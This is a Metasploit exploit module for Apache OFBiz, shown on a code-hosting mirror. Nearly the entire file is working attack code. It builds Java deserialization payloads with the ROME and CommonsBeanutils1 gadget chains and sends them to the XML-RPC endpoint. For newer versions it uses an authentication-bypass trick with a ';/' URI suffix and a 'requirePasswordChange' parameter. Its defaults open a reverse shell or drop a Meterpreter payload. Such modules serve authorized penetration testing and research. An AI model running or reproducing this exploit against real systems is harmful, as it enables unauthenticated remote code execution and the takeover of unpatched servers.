Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/http/apache_ofbiz_deserialization.rb
31477 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7


8
  Rank = ExcellentRanking

9


10
  prepend Msf::Exploit::Remote::AutoCheck

11
  include Msf::Exploit::Remote::HttpClient

12
  include Msf::Exploit::CmdStager

13
  include Msf::Exploit::JavaDeserialization

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Apache OFBiz XML-RPC Java Deserialization',

20
        'Description' => %q{

21
          This module exploits a Java deserialization vulnerability in Apache

22
          OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for

23
          versions prior to 17.12.01 using the ROME gadget chain.

24


25
          Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467

26
          and use the CommonsBeanutils1 gadget chain.

27


28
          Verified working on 18.12.09, 17.12.01, and 15.12

29
        },

30
        'Author' => [

31
          'Alvaro Muñoz', # Discovery

32
          'wvu', # Exploit

33
          'h00die' # cve-2023-49070

34
        ],

35
        'References' => [

36
          ['CVE', '2020-9496'],

37
          ['CVE', '2023-49070'], # auth bypass update

38
          ['CVE', '2023-51467'], # auth bypass update

39
          ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz'],

40
          ['URL', 'https://ofbiz.apache.org/release-notes-17.12.04.html'],

41
          ['URL', 'https://issues.apache.org/jira/browse/OFBIZ-11716'],

42
          ['URL', 'https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/'] # auth bypass

43
        ],

44
        'DisclosureDate' => '2020-07-13', # Vendor release note

45
        'License' => MSF_LICENSE,

46
        'Privileged' => false,

47
        'Targets' => [

48
          [

49
            'Unix Command',

50
            {

51
              'Platform' => 'unix',

52
              'Arch' => ARCH_CMD,

53
              'Type' => :unix_cmd,

54
              'DefaultOptions' => {

55
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'

56
              }

57
            }

58
          ],

59
          [

60
            'Linux Dropper',

61
            {

62
              'Platform' => 'linux',

63
              'Arch' => [ARCH_X86, ARCH_X64],

64
              'Type' => :linux_dropper,

65
              'DefaultOptions' => {

66
                'CMDSTAGER::FLAVOR' => :curl,

67
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'

68
              }

69
            }

70
          ]

71
        ],

72
        'DefaultTarget' => 1,

73
        'DefaultOptions' => {

74
          'SSL' => true

75
        },

76
        'Notes' => {

77
          'Stability' => [CRASH_SAFE],

78
          'Reliability' => [REPEATABLE_SESSION],

79
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]

80
        }

81
      )

82
    )

83


84
    register_options([

85
      Opt::RPORT(8443),

86
      OptString.new('TARGETURI', [true, 'Base path', '/']),

87
    ])

88
  end

89


90
  # attempt to determine the version number. This attempt is flawed on versions

91
  # < 17. 17+ has the Release on the /webtools/control/xmlrpc page. This page

92
  # doesn't exist on versions < 17, so we just return back 'pre-17'

93
  def version_from_login_page

94
    res = send_request_cgi({

95
      'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc')

96
    })

97
    return nil if res.nil?

98
    return 'pre-17' unless res.code == 200

99
    # https://rubular.com/r/vputt9uJecevOk

100
    if res.body =~ %r{Apache OFBiz\.</a> Release\s+(?:release)?([\d.]+)}

101
      return Regexp.last_match(1).strip

102
    end

103


104
    'unknown'

105
  end

106


107
  def check

108
    # Send an empty serialized object

109
    res = send_request_xmlrpc('')

110


111
    return CheckCode::Unknown('Target did not respond to check.') unless res

112


113
    if res.body.include?('Failed to read result object: null')

114
      @version = 'pre-17'

115
      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')

116
    end

117


118
    # newer @versions respond w/o a content length, so just validate the URL returns something that looks like OFBiz

119
    @version = version_from_login_page

120


121
    return CheckCode::Unknown('Target did not respond to check.') if @version.nil?

122
    return CheckCode::Unknown('Target version could not be determined') if @version == 'unknown'

123


124
    return CheckCode::Appears('Apache OFBiz pre version 17 detected') if @version == 'pre-17'

125
    return CheckCode::Appears("Apache OFBiz version #{@version} detected") if Rex::Version.new(@version) < Rex::Version.new('18.12.11')

126


127
    CheckCode::Safe("Apache OFBiz version #{@version} detected, and is unexploitable")

128
  end

129


130
  def exploit

131
    @version = version_from_login_page if @version.nil?

132


133
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

134


135
    case target['Type']

136
    when :unix_cmd

137
      execute_command(payload.encoded)

138
    when :linux_dropper

139
      execute_cmdstager

140
    end

141
  end

142


143
  def execute_command(cmd, _opts = {})

144
    vprint_status("Executing command: #{cmd}")

145


146
    if @version == 'pre-17'

147
      vprint_status('Utilizing ROME deserialization chain')

148
      res = send_request_xmlrpc(

149
        # framework/webapp/lib/rome-0.9.jar

150
        # used with 15.12, but not 18.12 compatible

151
        generate_java_deserialization_for_command('ROME', 'bash', cmd)

152
      )

153
    else

154
      vprint_status('Utilizing CommonsBeanutils1 deserialization chain')

155
      res = send_request_xmlrpc(

156
        # framework/webapp/lib/rome-0.9.jar

157
        # used with 18.12 compatible, but not 15.12 compatible

158
        generate_java_deserialization_for_command('CommonsBeanutils1', 'bash', cmd) # works against both

159
      )

160
    end

161


162
    unless res && res.code == 200

163
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")

164
    end

165


166
    print_good("Successfully executed command: #{cmd}")

167
  end

168


169
  def send_request_xmlrpc(data)

170
    # http://xmlrpc.com/

171
    # https://ws.apache.org/xmlrpc/

172
    request = {

173
      'method' => 'POST',

174
      'uri' => normalize_uri(target_uri.path, '/webtools/control/xmlrpc'),

175
      'ctype' => 'text/xml',

176
      'data' => <<~XML

177
        <?xml version="1.0"?>

178
        <methodCall>

179
          <methodName>#{rand_text_alphanumeric(8..42)}</methodName>

180
          <params>

181
            <param>

182
              <value>

183
                <struct>

184
                  <member>

185
                    <name>#{rand_text_alphanumeric(8..42)}</name>

186
                    <value>

187
                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable>

188
                    </value>

189
                  </member>

190
                </struct>

191
              </value>

192
            </param>

193
          </params>

194
        </methodCall>

195
      XML

196
    }

197


198
    unless @version == 'pre-17'

199
      request['uri'] = normalize_uri(target_uri.path, '/webtools/control/xmlrpc;/') # tack on ;/

200
      request['vars_get'] = {

201
        'USERNAME' => '',

202
        'PASSWORD' => rand_text_alphanumeric(1..5),

203
        'requirePasswordChange' => 'Y' # magic bypass string

204
      }

205
    end

206


207
    send_request_cgi(request)

208
  end

209


210
end

211


212